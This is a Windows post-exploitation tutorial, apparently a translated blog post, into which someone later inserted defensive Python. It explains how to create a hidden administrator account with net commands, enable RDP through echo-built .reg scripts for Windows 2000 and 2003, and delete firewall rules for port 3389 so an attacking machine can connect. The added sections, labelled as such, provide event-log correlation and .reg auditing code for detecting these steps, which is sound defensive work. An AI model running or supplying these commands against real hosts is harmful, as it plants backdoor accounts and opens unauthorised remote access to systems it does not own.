  • Windows privilege escalation and enabling remote connections

    1. Privilege escalation:

        Create a normal user: net user <account> <password> /add

        Make that account an administrator: net localgroup administrators <account> /add

        Change a user's password: net user <account> <password>

        Delete a user: net user <account> /del
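
Each of the four net commands above leaves a distinct Windows Security event (4720 account created, 4732 member added to a security-enabled local group, 4724 password reset attempted, 4726 account deleted). The following detection logic is an added example, not part of the original post: it correlates constructed records that mimic the fields of those events and flags an account that is created and added to Administrators within minutes, or created and then deleted again shortly after. The field names follow the real event schema; the SIDs, user names and timestamps are constructed.

```python
"""Correlate Security-log events produced by net user / net localgroup abuse.

Added detection example. Event IDs are the real ones (4720, 4732, 4726);
the records in SAMPLE_EVENTS are constructed to mimic their fields.
"""
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample records (field names follow the real event schema).
SAMPLE_EVENTS: List[Dict] = [
    {"TimeCreated": "2017-10-20T14:01:02", "EventID": 4720, "SubjectUserName": "websvc",
     "TargetUserName": "backup$", "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"TimeCreated": "2017-10-20T14:01:09", "EventID": 4732, "SubjectUserName": "websvc",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1-2-3-1105"},
    {"TimeCreated": "2017-10-20T14:40:00", "EventID": 4726, "SubjectUserName": "websvc",
     "TargetUserName": "backup$", "TargetSid": "S-1-5-21-1-2-3-1105"},
    # A normal onboarding: created one day, granted admin the next day.
    {"TimeCreated": "2017-10-20T15:30:00", "EventID": 4720, "SubjectUserName": "Administrator",
     "TargetUserName": "jdoe", "TargetSid": "S-1-5-21-1-2-3-1106"},
    {"TimeCreated": "2017-10-21T09:00:00", "EventID": 4732, "SubjectUserName": "Administrator",
     "TargetUserName": "Administrators", "MemberSid": "S-1-5-21-1-2-3-1106"},
]


def detect_local_admin_abuse(
    events: List[Dict],
    admin_window: timedelta = timedelta(minutes=10),
    lifetime_window: timedelta = timedelta(hours=24),
) -> List[str]:
    """Return alert strings for create-then-admin and create-then-delete sequences.

    Correlation is on the account SID: 4720 carries TargetSid, 4732 carries
    MemberSid (real 4732 events often report MemberName as "-", so the SID is
    the reliable join key) and 4726 carries TargetSid again.
    """
    created: Dict[str, Dict] = {}  # SID -> the 4720 record that created it
    alerts: List[str] = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        now = datetime.fromisoformat(ev["TimeCreated"])
        eid = ev["EventID"]
        if eid == 4720:
            created[ev["TargetSid"]] = ev
        elif eid == 4732 and ev["TargetUserName"].lower() == "administrators":
            origin = created.get(ev["MemberSid"])
            if origin is not None:
                age = now - datetime.fromisoformat(origin["TimeCreated"])
                if age <= admin_window:
                    alerts.append(
                        f"{ev['SubjectUserName']} created {origin['TargetUserName']} "
                        f"and made it a local admin {int(age.total_seconds())}s later"
                    )
        elif eid == 4726:
            origin = created.get(ev["TargetSid"])
            if origin is not None:
                age = now - datetime.fromisoformat(origin["TimeCreated"])
                if age <= lifetime_window:
                    alerts.append(
                        f"short-lived account {origin['TargetUserName']} deleted by "
                        f"{ev['SubjectUserName']} {int(age.total_seconds())}s after creation"
                    )
    return alerts


if __name__ == "__main__":
    for alert in detect_local_admin_abuse(SAMPLE_EVENTS):
        print(alert)
```

Only the two windows decide what is flagged: a help-desk account created one afternoon and granted admin the next morning falls outside the ten-minute window and is not reported, while the seven-second create-and-promote sequence and the later cleanup of the same account both are.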
    

    2. Enabling remote connections:

    Opening port 3389 from cmd on Windows 2000

    echo Windows Registry Editor Version 5.00 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
    echo "Enabled"="0" >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
    echo "ShutdownWithoutLogon"="0" >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
    echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
    echo "TSEnabled"=dword:00000001 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
    echo "Start"=dword:00000002 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
    echo "Start"=dword:00000002 >>3389.reg
    echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
    echo "Hotkey"="1" >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
    echo "PortNumber"=dword:00000D3D >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
    echo "PortNumber"=dword:00000D3D >>3389.reg
    

    Opening port 3389 from cmd on Windows 2003:

    echo Windows Registry Editor Version 5.00 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
    echo "fDenyTSConnections"=dword:00000000 >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
    echo "PortNumber"=dword:00000D3D >>3389.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
    echo "PortNumber"=dword:00000D3D >>3389.reg

    In cmd, type regedit /s 3389.reg to import the file into the registry.
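
Both scripts above (the Windows 2000 and the Windows 2003 variants) are plain .reg files built with echo, and a .reg file is easy to audit before it is imported or when it turns up on a host. The parser below is an added example, not code from the original post: it reads the two value syntaxes the scripts use (dword:HEX and "string"), keys the entries by registry path, and reports the changes that enable Terminal Services, start TermService, relax the Installer policy, or set the RDP listening port (flagging a non-default port). The registry paths are the real ones written by the scripts; the two sample .reg texts are constructed.

```python
"""Parse a .reg file and flag entries that enable or relocate RDP.

Added example for defenders. The key paths are the real ones the 3389.reg
scripts write; SAMPLE_REG and SAMPLE_REG_MOVED_PORT are constructed inputs.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple, Union

RegValue = Union[int, str]
RegKey = Tuple[str, str]  # (key path, value name), both lower-cased for matching

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<val>.+)$')

TS_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
TERMSERVICE_KEY = r"hkey_local_machine\system\currentcontrolset\services\termservice"
INSTALLER_POLICY_KEY = r"hkey_local_machine\software\policies\microsoft\windows\installer"
DEFAULT_RDP_PORT = 0x0D3D  # 3389

# Constructed sample mirroring what the Windows 2003 script writes.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000D3D
"""

# Constructed sample that moves RDP to a non-default port (0x1F90 = 8080).
SAMPLE_REG_MOVED_PORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00001F90
"""


def decode_value(raw: str) -> RegValue:
    """Decode the two value syntaxes the scripts use: dword:HEX and "string"."""
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    return raw  # hex:, hex(2): etc. are kept as text; not needed for these checks


def parse_reg(text: str) -> Dict[RegKey, RegValue]:
    """Return {(key, name): value} for every value line under a [key] section."""
    entries: Dict[RegKey, RegValue] = {}
    key: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()  # the echo scripts leave a trailing space on every line
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()  # [-key] deletion markers are not interpreted here
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            entries[(key, m["name"].lower())] = decode_value(m["val"])
    return entries


# (key, value name, predicate on the decoded value, finding text)
CHECKS: List[Tuple[str, str, Callable[[RegValue], bool], str]] = [
    (TS_KEY, "fdenytsconnections", lambda v: v == 0,
     "RDP connections enabled (fDenyTSConnections=0)"),
    (TS_KEY, "tsenabled", lambda v: v == 1,
     "Terminal Services enabled (TSEnabled=1, Windows 2000 style)"),
    (TERMSERVICE_KEY, "start", lambda v: v in (2, 3),
     "TermService start type set so the service will run (Start=2 or 3)"),
    (INSTALLER_POLICY_KEY, "enableadmintsremote", lambda v: v == 1,
     "Administrator installs over Terminal Services enabled (EnableAdminTSRemote=1)"),
]


def audit_reg(text: str) -> List[str]:
    """Return human-readable findings for the RDP-related changes in a .reg text."""
    entries = parse_reg(text)
    findings: List[str] = []
    for key, name, predicate, message in CHECKS:
        value = entries.get((key, name))
        if value is not None and predicate(value):
            findings.append(message)
    # PortNumber lives under the legacy Wds\rdpwd\Tds\tcp key or under WinStations\RDP-Tcp.
    for (key, name), value in entries.items():
        if name == "portnumber" and isinstance(value, int) and (
            key.endswith(r"\rdp-tcp") or key.endswith(r"\tds\tcp")
        ):
            tag = "default" if value == DEFAULT_RDP_PORT else "non-default"
            findings.append(f"RDP listening port set to {value} ({tag}) under {key}")
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_REG, SAMPLE_REG_MOVED_PORT):
        for finding in audit_reg(sample):
            print(finding)
```

Run it against a suspicious 3389.reg found on disk, or against the output of a reg export of the Terminal Server keys, to see at a glance whether RDP was switched on and which port it was given.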

    3. Make the remote connection from the attacking machine. If it cannot connect, the compromised machine has its firewall turned on, so we need to delete the firewall's rules for port 3389.

        Type netsh firewall /? to show the command's usage.
        A delete option should appear. Then type: netsh firewall delete. Newer versions only print "The following commands are available:" and nothing more, in which case we need a different command, as follows.

        Type netsh advfirewall firewall /? to show that command's usage.
        A delete option appears here as well. Type: netsh advfirewall firewall delete. It shows "delete rule    - Deletes all matching firewall rules."
        Following that hint, type: netsh advfirewall firewall delete rule. This prints a long help text, which I will not paste here; there are examples at the end that you can look at.
        Finally, use this command directly to kill (delete) the firewall rules set for port 3389. The final command:

        netsh advfirewall firewall delete rule name=all protocol=tcp localport=3389


    Bingo! You should be able to connect now, right?

  • Original URL: https://www.cnblogs.com/litlife/p/7702689.html